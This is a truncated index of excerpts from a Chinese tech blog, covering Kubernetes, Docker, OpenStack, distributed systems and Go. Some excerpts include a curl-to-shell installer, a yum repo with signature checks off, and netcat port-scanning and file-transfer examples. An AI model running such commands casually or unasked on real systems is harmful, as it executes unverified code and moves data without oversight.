Kubernetes 任意文件访问漏洞

前段时间 Kubernetes 发布了一系列的安全更新,修复了一个因 subpath 处理不当导致的任意文件访问漏洞(CVE-2017-1002101和 CVE-2017-1002

Kubernetes 任意文件访问漏洞

前段时间 Kubernetes 发布了一系列的安全更新,修复了一个因 subpath 处理不当导致的任意文件访问漏洞(CVE-2017-1002101和 CVE-2017-1002

Azure Container Instance (ACI)

Azure 容器实例(ACI)提供了在 Azure 中运行容器的最简捷方式,它不需要用户配置任何虚拟机或其它高级服务。ACI 适用于快速突发式增长和资源调整的业务,

Azure Container Service(ACS)简介

Azure Container Service(ACS)是 Microsoft Azure 在2015年推出的容器服务,支持 Kubernetes、DCOS 以及 Dockers Swarm 等多种容器编排工具。并且 ACS 的核心功能

Azure Managed Kubernetes (AKS) 简介

Azure 容器服务 (AKS) 是 Microsoft Azure 最近发布的一个托管的 Kubernetes 服务(预览版),它独立于现有的 Azure Container Service (ACS)。借助 AKS 用户无需具备容器业务流程的专业知识就可以快速、

Docker MTA Program

在容器化和云原生的大潮下,很多公司都已经开始了容器化的进程。然而,将已有应用转化为容器和云原生架构并不容易,并且这些遗留应用的维护可能会花费

Docker CE/EE 原生支持Kubernetes

在今年的 DockerCon EU (2017) 上,Solomon、Brendan、Hockin等联合宣布Docker将原生支持Kubernetes,也就是说Kubernet

重新开启HTTPS

github pages为未配置自定义域名的网站(格式为<username>.github.io)自动开启了https,但一直不支持配置自定

Tensorflow实践

Tensorflow是谷歌在2015年11月开源的机器学习框架,来源于Google内部的深度学习框架DistBelief。由于其良好的架构、

开始一本开源电子书《Kubernetes指南》

Kubernetes是谷歌开源的容器集群管理系统,是Google多年大规模容器管理技术Borg的开源版本,也是CNCF最重要的组件之一,主要

Debugging application in containers

对于普通的服务器进程,我们可以很方便的使用宿主机上的各种工具来调试;但容器经常是仅包含必要的应用程序,一般不包含常用的调试工具,那如何在线调

使用docker dind创建swarm集群

在OS X系统上,由于Docker for Mac只能创建一台虚拟机,所以要创建多节点swarm集群的话,就需要额外启动其他的虚拟机,并手动安装和配置

Grumpy: 使用Go来运行Python程序

Grumpy是Google近期开源(https://github.com/google/grumpy)的把Python程序编译成Go程序的工

bcc

BPF Compiler Collection (BCC) - Tools for BPF-based Linux IO analysis, networking, monitoring Website: https://github.com/iovisor/bcc Basic usage of bcc (tutorial) Install bcc: echo -e '[iovisor]\nbaseurl=https://repo.iovisor.org/yum/nightly/f23/$basearch\nenabled=1\ngpgcheck=0' | sudo tee /etc/yum.repos.d/iovisor.repo yum install bcc-tools Now bcc is installed at /usr/share/bcc/tools. # ls /usr/share/bcc/tools argdist cachestat ext4dist hardirqs offwaketime softirqs tcpconnect vfscount bashreadline cachetop ext4slower killsnoop old solisten tcpconnlat vfsstat biolatency capable filelife llcstat oomkill sslsniff tcplife wakeuptime biosnoop cpudist fileslower mdflush opensnoop stackcount tcpretrans xfsdist biotop dcsnoop filetop memleak pidpersec stacksnoop tcptop xfsslower bitesize dcstat funccount mountsnoop profile statsnoop tplist zfsdist btrfsdist doc funclatency mysqld_qslower runqlat syncsnoop trace zfsslower btrfsslower execsnoop gethostlatency offcputime slabratetop tcpaccept ttysnoop capable

Kubernetes v1.5.0 release

Update on 2016.12.14: Due to a serious security problem, kubernetes v1.5.0 is not recommanded. Kubernetes v1.5.1 has just released, so we should upgrade to v1.5.1 directly. The --anonymous-auth= flag in v1.5.0 is true by default (which may result in any users being able to access kubernetes API), but v1.5.1 turns it to false. Kubernetes v1.5.0 StatefulSets (ex-PetSets) StatefulSets are beta now (fixes and stabilization) Improved Federation Support New command: kubefed DaemonSets Deployments ConfigMaps Simplified Cluster Deployment Improvements to kubeadm HA Setup for Master Node Robustness and Extensibility Windows Server Container support CRI for pluggable container runtimes kubelet API supports authentication and authorization Features Features for this release were tracked via the use of the kubernetes/features issues repo.

Weekly reading list

Docker收购Infinit PDF Infinit为容器提供了分布式存储,其特点包括 基于软件:可以部署在任何硬件之上,从遗留设备到消费级实体机、

Weekly reading list

分布式后台毫秒服务引擎 腾讯QQ团队于12月4日开源了一个服务开发运营框架,叫做毫秒服务引擎(Mass Service Engine in Cluster,MSEC),它集R

KubeCon/CloudNativeCon 2016见闻

题记:上周去西雅图参加了KubeCon&CloudNativeCon 2016,不仅见到Dawn、Brendan、Tim以及Sig No

sysdig

Tips of sysdig Sysdig captures system calls and other system level events using a linux kernel facility called tracepoints, providing a rich set of real-time, system-level information. Sysdig “packetizes” this information, so that you can do things like save it into trace files and easily filter it, a bit like you would do with tcpdump. This makes it very flexible to explore what processes are doing. Sysdig instruments your physical and virtual machines at the OS level by installing into the Linux kernel and capturing system calls and other OS events.

Kubernetes Development

Tips for kubernetes development Setup development virtual machine apt-get install -y gcc make socat git # install docker curl -fsSL https://get.docker.com/ | sh # install etcd curl -L https://github.com/coreos/etcd/releases/download/v3.0.10/etcd-v3.0.10-linux-amd64.tar.gz -o etcd-v3.0.10-linux-amd64.tar.gz && tar xzvf etcd-v3.0.10-linux-amd64.tar.gz && /bin/cp -f etcd-v3.0.10-linux-amd64/{etcd,etcdctl} /usr/bin && rm -rf etcd-v3.0.10-linux-amd64* # install golang curl -sL https://storage.googleapis.com/golang/go1.8.linux-amd64.tar.gz | tar -C /usr/local -zxf - export GOPATH=/gopath export PATH=$PATH:$GOPATH/bin:/usr/local/bin:/usr/local/go/bin/ # Get kubernetes code mkdir -p $GOPATH/src/k8s.io git clone https://github.

Paxos

Paxos Paxos算法是莱斯利·兰伯特于1990年提出的一种基于消息传递且具有高度容错特性的一致性算法。 论文 The Part-Time Parliament Paxos Made Simple Paxos Made Live CONSENSUS: BRIDGING THEORY AND PRACTICE Paxos

Zab

Zab Zab (Zookeeper atomic broadcast protocol)是Zookeeper内部用到的一致性协议。相比Paxos,Zab最大的特点是保证强一致性(strong consi

分布式系统的一致性

考虑在数据冗余情况下一致性和性能的问题,即: 1)要想让数据有高可用性,就得写多份数据。 2)写多份的问题会导致数据一致性的问题。 3)数据一致性

SR-IOV

SR-IOV SR-IOV(Single Root I/O Virtualization)是一个将PCIe共享给虚拟机的标准,通过为虚拟机提供独立的内存空间、中断、DM

PV Calls

PV Calls is a paravirtualized protocol that allows the implementation of a set of POSIX functions in a different domain. The PV Calls frontend sends POSIX function calls to the backend, which implements them and returns a value to the frontend. This version of the document covers networking function calls, such as connect, accept, bind, release, listen, poll, recvmsg and sendmsg; but the protocol is meant to be easily extended

Virtio vsock

virtio-vsock is a host/guest communications device. It allows applications in the guest and host to communicate. This can be used to implement hypervisor services and guest agents (like qemu-guest-agent or SPICE vdagent). Unlike virtio-serial, virtio-vsock supports the POSIX Sockets API so existing networking applications require minimal modification. The Sockets API allows N:1 connections so multiple clients can connect to a server simultaneously. The device has an address assigned automatically so

云原生(Cloud Native)

Cloud Native is structuring teams, culture and technology to utilize automation and architectures to manage complexity and unlock velocity. 云原生应用,是指原生为在云平台上部署运行而设计开发的应用。公平的说,大多数传统的应用,不做任何改动,都

SwarmKit

SwarmKit SwarmKit是随着docker 1.12发布的集群管理系统,并内置在docker daemon中,主要提供以下的功能: 容器调度、健康检查和

Kubernetes container runtime interface

题记:最近一段时间在做Kubernetes容器引擎接口(Container Runtime Interface, CRI)的重构,并支持以插件的方式引入外部容

Go语言技巧

Go语言技巧 常用工具 go fmt golint go vet goimports https://goreportcard.com/ 惯用法 注释用完整句子,以方法或包名开头 每行控制80字节长度 error字符串首字母小写 多个相同变量的返回值加

Kubernetes中的服务发现与负载均衡

Kubernetes在设计之初就充分考虑了针对容器的服务发现与负载均衡机制,提供了Service资源,并通过kube-proxy配合clou

如何快速启动一个Kubernetes集群

相比Docker一个二进制文件解决所有问题,Kubernetes则为不同的服务提供了不同的二进制文件,并将一些服务放到了addons中。故而

Setup hyperd with flannel network

Flannel Flannel is a virtual network that gives a subnet to each host for use with container runtimes. Platforms like Google’s Kubernetes assume that each container (pod) has a unique, routable IP inside the cluster. The advantage of this model is that it reduces the complexity of doing port mapping. flannel runs an agent, flanneld, on each host and is responsible for allocating a subnet lease out of a preconfigured address space.

Play with docker v1.12

[TOC] Docker v1.12 brings in its integrated orchestration into docker engine. Starting with Docker 1.12, we have added features to the core Docker Engine to make multi-host and multi-container orchestration easy. We’ve added new API objects, like Service and Node, that will let you use the Docker API to deploy and manage apps on a group of Docker Engines called a swarm. With Docker 1.12, the best way to orchestrate Docker is Docker!

Playing docker with hypervisor container runtime runV

Table of contents: [TOC] The latest master branch of runV has already supported running as an runtime in docker. Since v1.11, docker introduced OCI contain runtime (runc) integration via containerd. Since runc and runV are both recommended implementation of OCI, it is natural to make runV working with containerd. Now let’s have a try. Install runv and docker Docker could be installed via https://docs.docker.com/engine/installation/. Since only master branch of runV

Kubernetes-mesos architecture

From http://cdn.yongbok.net/ruo91/architecture/k8s/kubernetes_mesos_architecture_v1.x.png

Hypernetes: Bringing Security and Multi-tenancy to Kubernetes

Notes: this post is copied from http://blog.kubernetes.io/2016/05/hypernetes-security-and-multi-tenancy-in-kubernetes.html. Today’s guest post is written by Harry Zhang and Pengfei Ni, engineers at HyperHQ, describing a new hypervisor based container called HyperContainer While many developers and security professionals are comfortable with Linux containers as an effective boundary, many users need a stronger degree of isolation, particularly for those running in a multi-tenant environment. Sadly, today, those users are forced to run their containers inside virtual machines, even one VM per container.

How docker 1.11 share network accross containers

Docker 1.11 has moved to runc with containerd, I am interested in how it processing shared netns accross containers. For example, I have already running a container 75599a6f387b7842c6da57efd38f9742b2ca621782f891402f83852c66dbd706. A new container within same netns can be created with cmd: docker run -itd --net=container:75599a6f387b alpine sh This will generate a runc config.json as follows: { "ociVersion": "0.6.0-dev", "platform": { "os": "linux", "arch": "amd64" }, "process": { "terminal": true, "user": { "additionalGids": [ 0, 1, 2, 3, 4, 6, 10, 11, 20, 26, 27 ] }, "args": [ "sh" ], "env": [ "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", "HOSTNAME=75599a6f387b", "TERM=xterm" ], "cwd": "/", "capabilities": [ "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_FSETID", "CAP_FOWNER", "CAP_MKNOD", "CAP_NET_RAW", "CAP_SETGID", "CAP_SETUID", "CAP_SETFCAP", "CAP_SETPCAP", "CAP_NET_BIND_SERVICE", "CAP_SYS_CHROOT", "CAP_KILL", "CAP_AUDIT_WRITE" ] }, "root": { "path": "/var/lib/docker/devicemapper/mnt/d33c7932917e64bde482b437fc3ccaad9a00a04e0cf49e39f9d3be5d71991db6/rootfs", "readonly": false }, "hostname": "75599a6f387b", "mounts": [ { "destination": "/proc", "type": "proc", "source": "proc", "options": [ "nosuid", "noexec", "nodev" ] }, { "destination": "/dev", "type": "tmpfs", "source": "tmpfs", "options": [ "nosuid", "strictatime", "mode=755" ] }, { "destination": "/dev/pts", "type": "devpts", "source": "devpts", "options": [ "nosuid", "noexec", "newinstance", "ptmxmode=0666", "mode=0620", "gid=5" ] }, { "destination": "/sys", "type": "sysfs", "source": "sysfs", "options": [ "nosuid", "noexec", "nodev", "ro" ] }, { "destination": "/sys/fs/cgroup", "type": "cgroup", "source": "cgroup", "options": [ "ro", "nosuid", "noexec", "nodev" ] }, { "destination": "/dev/mqueue", "type": "mqueue", "source": "mqueue", "options": [ "nosuid", "noexec", "nodev" ] }, { "destination": "/etc/resolv.

Go performance optimize

**Go性能优化技巧(By 雨痕) 字符串(string)作为一种不可变类型,在与字节数组(slice, [ ]byte)转换时需付出 “沉重” 代价,

The Rise of Cloud Computing Systems - Jeff Dean

{% pdf http://feiskyer.github.io/assets/ccs.pdf %}

Reading notes of week 17

SIG-Networking: Kubernetes Network Policy APIs Coming in 1.3 One problem many users have is that the open access network policy of Kubernetes is not suitable for applications that need more precise control over the traffic that accesses a pod or service. Today, this could be a multi-tier application where traffic is only allowed from a tier’s neighbor. But as new Cloud Native applications are built

runc and runV

runc is a CLI tool for spawning and running containers according to the OCI specification, while runV is a hypervisor-based runtime for OCI. Both of them are recommanded (implementations](https://github.com/opencontainers/runtime-spec/blob/master/implementations.md) of OCI. Playing with runc Install runc: yum install -y libseccomp-devel mkdir -p $GOPATH/src/github.com/opencontainers cd $GOPATH/src/github.com/opencontainers git clone https://github.com/opencontainers/runc cd runc make sudo make install Run busybox: $ docker pull busybox $ mkdir rootfs $ docker export $(docker create busybox) | tar -C rootfs -xvf - $ runc spec .

Container runtime in Docker v1.11

Docker v1.11正式集成了runc(终于支持OCI了),并将原来的一个二进制文件拆分为多个,同时还保持docker CLI和API不变: docker docker-containerd docker-containerd-shim docker-runc docker-containerd-ctr

DPDK Introduction

DPDK Introduction Intel DPDK全称Intel Data Plane Development Kit,是intel提供的数据平面开发工具集,为Intel architecture(IA)处理器架构下用户

Tips for cgo

cgo的一些tips 基本类型 The standard C numeric types are available under the names C.char, C.schar (signed char), C.uchar (unsigned char), C.short, C.ushort (unsigned short), C.int, C.uint (unsigned int), C.long, C.ulong (unsigned long), C.longlong (long long), C.ulonglong (unsigned long long), C.float, C.double, C.complexfloat (complex float), and C.complexdouble (complex double). The C type void* is represented by Go’s unsafe.Pointer. The C

cgo in go 1.6

The major change is the definition of rules for sharing Go pointers with C code, to ensure that such C code can coexist with Go’s garbage collector. Briefly, Go and C may share memory allocated by Go when a pointer to that memory is passed to C as part of a cgo call, provided that the memory itself contains no pointers to Go-allocated memory, and provided that C does not retain the pointer after the call returns.

Borg, Omega, and Kubernetes (ACM Queue)

Brendan Burns, Brian Grant等在Borg, Omega, and Kubernetes - Lessons learned from three container-management systems over a decade分享了Google在容器管理的经验教训。 在谷歌的历史上,开发了三种容器管理

Docker overlay network dive

DON MILLS写的Docker Multi-Host Networking: Overlays to the Rescue对Docker的overlay network做了细致的分析,值得看一看。

Kubernetes sig-node (Asia) meeting notes

Kubernetes 1.2 Status Update (@dchen) Deployment object and HPA scale还有一些P0和P1的问题待解决 aws还有挺多的问题(应该要超过20个) 整个v1.2还有超过100个issue,但

10 things to avoid in docker containers

Redhat发布的10 things to avoid in docker containers对于构建基于Container的服务非常有意义。摘录如下: 1) Don’t store data in containers – A container can be

Carina by Rackspace

What is Carina? Carina is a container runtime environment (currently in Beta) that offers performance, container-native tools, and portability without sacrificing ease of use. You can get started in minutes by using open-source software on managed infrastructure to run your containerized applications. Your containers run in a bare-metal environment, which avoids the “hypervisor tax” on performance. Applications in this environment launch as much as 20 percent faster and run as much as 60 percent faster.

Hypernetes简介 - feisky

【摘要】好久没有更新博客了,今天给大家介绍下最近在Hypernetes上做的工作,这个也是之前在微信群里的一个分享。Hypernetes是一

kubernetes多节点部署解析 - feisky

【摘要】注:以下操作均基于centos7系统。安装ansibleansilbe可以通过yum或者pip安装,由于kubernetes-ans

docker存储结构解析 - feisky

【摘要】由于aufs并未并入内核,故而目前只有Ubuntu系统上能够使用aufs作为docker的存储引擎,而其他系统上使用lvm thin prov

docker底层技术概览 - feisky

【摘要】docker解决了云计算环境难于分发并且管理复杂,而用KVM、Xen等虚拟化又浪费系统资源的问题。Docker最初是基于lxc构建了

OpenStack部署工具总结 - feisky

【摘要】目前感觉比较简单直观的部署工具有RDO、devstack、Fuel等:1. RDOhttps://openstack.redhat.c

使用 Device Mapper来改变Docker容器的大小 - feisky

【摘要】作者:Jérôme Petazzoni( Docker 布道师)译者:Mark Shao( EMC 中国高级工程师)如果在 CentOS 、 REHL 、 Fedor 或者其他默认没有 AUFS 支持的 Linux

从veth看虚拟网络设备的qdisc - feisky

【摘要】背景前段时间在测试docker的网络性能的时候,发现了一个veth的性能问题,后来给docker官方提交了一个PR,参考set tx_queuelen to 0

Kubernetes系统架构简介 - feisky

【摘要】1. 前言Together we will ensure that Kubernetes is a strong and open container management framework for any application and in any environment, whether i… 阅读全文

docker网络配置方法总结 - feisky

【摘要】docker启动时,会在宿主主机上创建一个名为docker0的虚拟网络接口,默认选择172.17.42.1/16,一个16位的子网掩

集群工具ansible使用方法 - feisky

【摘要】ansible简介ansible是与puppet、saltstack类似的集群管理工具,其优点是仅需要ssh和Python即可使用,

About

Hi,我是倪朋飞,工作在云计算领域,Kubernetes maintainer。在云计算、SDN网络和容器编排调度等领域具有多年实践经验。 社交

layout: post title: Software Engineering at Google date: 2017-02-13 19:36:09 tags: [Google] Google的Fergus Henderson在Software Engineering at Google中介绍了Google的软件工程实践。 软

layout: post title: AWS S3故障回顾和总结 date: 2017-03-03 22:27:50 tags: [aws] S3故障回顾 2月28日,AWS工程师在排查Northern Virginia (US-EAST-1) Region的一个S3计费问题时,因敲错了

layout: post title: Gitlab故障回顾和总结 date: 2017-03-03 22:27:37 tags: [] Gitlab故障回顾 1月31日,Giblab在修复一个PostgreSQL数据同步问题(DB Replication lagged too

layout: post title: Kubernetes HA date: 2017-03-15 18:12:47 tags: [kubernetes] Kubernetes从1.5开始,通过kops或者kube-up.sh部署的集群会自动部署一个高可用的系统,包括 etcd

layout: post title: LinuxKit date: 2017-04-19 11:09:53 tags: [docker] LinuxKit是Docker最新发布的一个用于为容器构建安全、便携、可移植操作系统的工具包。它根据用户编写的yaml(指

layout: “post” title: “Alpine Linux” date: “2016-03-26 14:27” Alpine Linux 随着Alpine Linux被越来越多的官方镜像使用,我们有必要了解一下Alpine Linux到底是个什么鬼。 Alpine Linux 是一个面

layout: “post” title: “Docker Datacenter” date: “2016-02-26 17:38” category: docker tags: [docker, cluster] Docker annonced Docker Datacenter (DDC) at Februrary 23. It is an integrated, end-to-end platform for agile application development and management from the datacenter to the cloud. With Docker Datacenter, organizations are empowered to deploy a Containers as a Services (CaaS) on-premises or in your virtual private cloud. A CaaS provides an IT managed and secured application environment of content and infrastructure where developers can build and deploy applications in a self service manner.

layout: “post” title: “Google’s Transition From Single Datacenter, To Failover, To A Native Multihomed Architecture” date: “2016-02-24 10:33” category: cluster tags: [highscalability, google] The main idea of the paper is that the typical failover architecture used when moving from a single datacenter to multiple datacenters doesn’t work well in practice. What does work, where work means using fewer resources while providing high availability and consistency, is a natively multihomed architecture:

layout: “post” title: “Hello world to Docker Mac” date: “2016-04-15 16:34” 终于等到了Docker for Mac。如之前期待的,体验真的很棒: 安装简单了,标准的Mac Application VPN无障碍 原生的(osxfs)

layout: “post” title: “Kubernetes drain” date: “2016-02-17 18:57” Kubernetes v1.2以前,如果想要对某个NODE(也就是Kubelet和Docker所在的机器)进行维护(比如升级Docker或者内核

layout: “post” title: “Kubernetes network policy” date: “2016-02-17 18:53” Kubernetes network policy Kubernetes社区(确切的说是Kubernetes Network SIG [1])正在讨论Network Policy Proposal,以实现

layout: “post” title: “Notes about serverless” date: “2016-02-26 13:36” category: cluster “只需要关注数据和业务逻辑,无需维护服务器,也不需要关心系统的容量和扩容”, serverless将大家从server中

layout: “post” title: “Upgrade CentOS kernel” date: “2016-03-30 22:25” tags: [linux] 终于耐不住要升级下kernel了,目前epel提供两个版本: kernel-lt (4.4)和kernel-ml (4.5): The kernel-ml packages are built from the sources available from the “mainline

2PC/3PC

404

API Design

Google API Design Guide OpenAPI Swagger KONG Tyk

AWS S3故障回顾和总结

S3故障回顾 2月28日,AWS工程师在排查Northern Virginia (US-EAST-1) Region的一个S3计费问题时,因敲错了一条playbook的参数而误删了大

Amazon Aurora

Amazon Aurora 是与 MySQL 兼容的关系数据库引擎,既具备高端商用数据库的速度和可用性,又有开源数据库的简单性和成本效益。Amazon Aurora 的性能最高可达到 MySQL 的五倍

Amazon DynamoDB

Amazon DynamoDB 是一项快速灵活的 NoSQL 数据库服务,适合所有需要一致性且延迟低于 10 毫秒的任意规模的应用程序。它是完全托管的云数据库,支持文档和键值存储模型。灵

Amazon Leadership Principles

顾客至尚 领导者从客户入手,再反向推动工作。他们努力工作,赢得并维系客户对他们的信任。虽然领导者会关注竞争对手,但是他们更关注客户 。 主人翁精神

Amazon RDS

Amazon Relational Database Service (Amazon RDS) 是最早的云数据库产品,提供托管的关系数据库,包括Amazon Aurora、PostgreSQL、MySQL、MariaDB、Or

Apache的Mesos和Google的Kubernetes 有什么区别

Kubernetes是一个开源项目,它把谷歌的集群管理工具引入到虚拟机和裸机场景中。它可以完美运行在现代的操作系统环境(比如CoreOS和R

AppArmor

AppArmor (Application Armor) 是Linux内核的一个安全模块,允许系统管理员将每个程序与一个安全配置文件关联,从而限制程序的功能。通过它你可以指定程序可以读、写或运

CAP

Ceph

Ceph是一个开源的分布式存储系统,同时提供了对象存储、块存储和文件系统存储,主要特点包括: 高扩展性:使用普通x86服务器,支持10~100

CockroachDB

CockroachDB是一个基于Google Spanner论文打造的一个可伸缩的、跨地域复制且兼容ACID的数据库。 Design Documents

Consul

Containerd

containerd 是为了兼容OCI标准而从Docker中拆分出来专门负责镜像管理和容器执行的组件。它向上对Docker提供gRPC接口,向下借助contai

Cosmos

Deploy a Mesos Cluster Using Docker

his tutorial will show you how to bring up a single node Mesos cluster all provisioned out using Docker containers (a future post will show how to easily scale this out to multi nodes or see the update on the bottom). This means that you can startup an entire cluster with 7 commands! Nothing to install except for starting out with a working Docker server. This will startup 4 containers:

Dive in Linux capabilites

Introduction Capabilities in Linux are flags that tell the kernel what the application is allowed to do, If you have no additional security mechanism in place, the Linux root user has all capabilities assigned to it. As capabilities are a way for running processes with some privileges, without having the need to grant them root privileges, it is important to understand that they exist. Consider the ping utility. It is

Docker

简介 Docker 是 dotCloud 最近几个月刚宣布的开源引擎,旨在提供一种应用程序的自动化部署解决方案,简单的说就是,在 Linux 系统上迅速创建一个容器(类似虚拟机)并在容

Docker acquires SDN startup SocketPlane

At Socketplane we started out as four guys with a collectively strong belief in open source and open communities.  We aligned around a shared vision that we wanted to be a critical part of Docker’s once in a decade disruption. Now that we are part of the Docker team, we couldn’t be happier. We never looked to hedge our bets, our success was and obviously still is tied to the success of Docker.

Docker storage

Storage driver Commonly used on Disabled on overlay ext4 xfs btrfs aufs overlay overlay2 zfs eCryptfs overlay2 ext4 xfs btrfs aufs overlay overlay2 zfs eCryptfs aufs ext4 xfs btrfs aufs eCryptfs btrfs btrfs only N/A devicemapper direct-lvm N/A vfs debugging only N/A zfs zfs only N/A

Docker 笔记

一、Docker 简介 Docker 两个主要部件: Docker: 开源的容器虚拟化平台 Docker Hub: 用于分享、管理 Docker 容器的 Docker SaaS 平台 – Docker Hub Docker 使用客户端-服务器 (C/S) 架构模式。Docke

Drawbridge

{% pdf http://feisky.xyz/container/drawbridge.pdf %}

Etcd

Etcd是CoreOS基于Raft开发的分布式key-value存储,可用于服务发现、共享配置以及一致性保障(如数据库选主、分布式锁等)。 E

Gitlab故障回顾和总结

Gitlab故障回顾 1月31日,Giblab在修复一个PostgreSQL数据同步问题(DB Replication lagged too far behind)时,误将生产环境的数据删除

Going Native with OpenStack Centric Applications: Murano

Following on our previous discussion surveying the projects supporting applications within OpenStack, let’s continue our review with an in-depth look at the OpenStack-native Application Catalog: Murano, currently an incubation status project, having seen its functionality and core services integration advanced over the past few OpenStack releases. What is it? An application catalog developed by Mirantis, HP and others (now including Cisco), that allows application developers and

Going Native with OpenStack Centric Applications: Overview

Cloud infrastructure is useless without applications running atop, providing business services and solving customer needs. So, as applications ascend to the throne as the rightful king of cloud, focus sharpens on their support within OpenStack-based clouds. With this focus, let’s walk through a survey of components and projects supporting applications in OpenStack, understanding what a day in the life of an application in OpenStack is like. We’ll start with an overview of the application ecosystem comprised of a number of supporting projects.

Google BigTable

Google 作为大数据的祖宗一样的存在,对于云真是错过了一波又一波:虚拟化错过一波让 VMWare 和 Docker 抢先了(Google 早在十年前就开始容器的方案,要知道容器赖

Google Cloud Datastore

在 2011 年,Google 发表了 Megastore 的论文,第一次描述了一个支持跨数据中心高可用 + 可以水平扩展 + 支持 ACID 事务语义的分布式存储系统。 Google Megastore 构建在 BigTable 之上,不

Google F1

在 Spanner 项目开始的同时,Google 启动了另外一个和 Spanner 配套使用的分布式 SQL 引擎的项目 F1,底层有那么一个强一致高性能的 Spanner,那么就可以在

Google生产环境

Google生产环境 硬件 约10台物理机组成机柜Rack,数台机柜组成机柜排Row,多排机柜组成集群Cluster,多个集群组成数据中心Dat

Hello World

Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub. Quick Start Create a new post $ hexo new "My New Post" More info: Writing Run server $ hexo server More info: Server Generate static files $ hexo generate More info: Generating

How enable OpenStack allinone vm to access external network

首先需要为OpenStack添加一个公网网络,假设All-in-one环境建的公网网段为10.10.10.0/24,公网网关为10.10.1

How to disable ubuntu services

To toggle a service from starting or stopping permanently you would need to: echo manual | sudo tee /etc/init/SERVICE.override where the stanza manual will stop Upstart from automatically loading the service on next boot. Any service with the .override ending will take precedence over the original service file. You will only be able to start the service manually afterwards. If you do not want this then simply delete the .

How to use docker compose to deploy a flask app

The flask app is very simple, you have an index page where your can write and read comments. To start So what we need ? In my case a Digital Ocean droplet (I’m using Fedora 21). So, first of all we connect to our vm with ssh. $ ssh [email protected] Now that we are inside we need to install git, Docker and docker-compose. $ yum -y install git docker python-pip $ pip install docker-compose==1.

Hypernetes The multi tenant Kubernetes distribution

“The Caas Revolution”. This is what we believe is happening today in the Cloud ecosystem. This revolution has been started by the now famous project (and company) Docker, and embraced by Cloud providers like Google and AWS. However, most multi-tenant CaaS solutions today run on a public IaaS, and use fully isolated virtual machine clusters to schedule containers. This is in contrast to the solely container-based implementation provided in private CaaS deployments.

Hypernetes wechat share

今天给大家介绍下最近在Hypernetes上做的工作。 Hypernetes是一个真正多租户的Kubernetes Distro。 Hyperne

Installing Realtek rltwifi driver for Ubuntu 14.10

安装方法 Ubuntu 14默认内核版本没有带RTL8192ee的网卡驱动,因而就无法通过无线网络联网,并且Reltek官方网站也没有提供合适的驱动。而最

Installing nova docker on OpenStack Juno

This post comes about indirectly by a request on IRC in #rdo for help getting nova-docker installed on Fedora 21. I ran through the process from start to finish and decided to write everything down for posterity. Getting started I started with the Fedora 21 Cloud Image, because I’m installing onto OpenStack and the cloud images include some features that are useful in this environment. We’ll be using OpenStack packages from the RDO Juno repository.

Integrating Openstack and Kubernetes with Murano

There’s a perceived competition between OpenStack and containers such as Docker, but in reality, the two technologies are a powerful combination. They both solve similar problems, but on different layers of the stack, so combining the two can give users more scalability and automation than ever before. That containers app you wrote needs to run somewhere. This is particularly true for orchestrated container applications, such as those managed by Kubernetes.

Kafka

Kafka是Linkedin开发的分布式消息系统,因其可水平扩展和高吞吐被广泛使用。其特点包括 快速持久化,常数时间复杂度的访问性能 高吞吐,单

Linux kernel network call flow

Refer http://blog.csdn.net/night_elf_1020/article/details/19935813

Linux netcat examples

端口扫描 nc -z -v -n 172.31.100.7 21-25 Chat Server Server: nc -l 1567 Client: nc 172.31.100.7 1567 文件传输 Server to Client: Server: nc -l 1567 < file.txt Client: nc -n 172.31.100.7 1567 > file.txt Client to Server: Server: nc -l 1567 > file.txt Client: nc 172.31.100.23 1567 < file.txt 目录传输 Server: tar -cvf - dir_name | nc -l 1567 Client: nc

Microservice Infrastructure

Microservices Infrastructure Modern platform for rapidly deploying globally distributed services provided by cisco. https://github.com/CiscoCloud/microservices-infrastructure Features the ability to deploy applications utilizing resources across multiple datacenters (and even clouds), deploying in a decentralized control model, supporting intelligent endpoints, heavy automation, and the on-demand nature of deploying these services to support business requirements and scale. Architectural Overview Mesos cluster manager for efficient resource isolation and sharing across distributed services Marathon for cluster management of long running containerized services Consul for service discovery (By using Consul’s inbuilt DNS server) Docker container runtime supported by Marathon Multi-datacenter support High availablity Single Data Center Architecture The base platform contains control nodes that manage the cluster and any number of compute nodes.

Mininet links

Introduction to Mininet: http://mininet.org/walkthrough/ OpenFlow Tutorial: https://github.com/mininet/openflow-tutorial/wiki Mininet walkthrough: http://mininet.org/walkthrough/ RYU SDN Framework: http://osrg.github.io/ryu-book/en/html/ A good ryu blog: http://linton.tw/

Neutron Layer 3 High Availability

L3 Agent Low Availability Today, you can utilize multiple network nodes to achieve load sharing, but not high availability or redundancy. Assuming three network nodes, creation of new routers will be scheduled and distributed amongst those three nodes. However, if a node drops, all routers on that node will cease to exist as well as any traffic normally forwarded by those routers. Neutron, in the Icehouse release, doesn’t support any built-in solution.

OVS 2.0 call flow

Refer http://blog.csdn.net/night_elf_1020/article/details/37600791

Open vSwitch over DPDK on Ubuntu

There are two approaches for using DPDK acceleration in DPDK. One is the openvswitch fork from intel, called dpdk-ovs the other is done directly in openvswitch with a different approach from intel. http://dpdk.org/ml/archives/dev/2014-March/001770.html - https://github.com/01org/dpdk-ovs VirtualBox preparations To run openvswitch with DPDK I used a virtual machine (VirtualBox) because the NIC I had on my laptop was not supported. I created three virtual NICs for my vm, one behind NAT

OpenStack Magnum社区及项目介绍

Add network management for native docker https://blueprints.launchpad.net/magnum/+spec/native-docker-network https://etherpad.openstack.org/p/magnum-native-docker-network From http://dockone.io/article/445

Perform Consistent Snapshots with qemu guest agent

A while back, I wrote an article about taking consistent snapshots of your virtual machines in your OpenStack environment. However this method was really intrusive since it required to be inside the virtual machine and to manually summon a filesystem freeze. In this article, I will use a different approach to achieve the same goal without the need to be inside the virtual machine. The only requirement is to have a virtual machine running the qemu-guest-agent.

Pluribus Networks

已经融资9500万美元的Pluribus公司,做得Server Switch产品,其CEO说,既能克服Vmware产品的scalability

Programming Resources

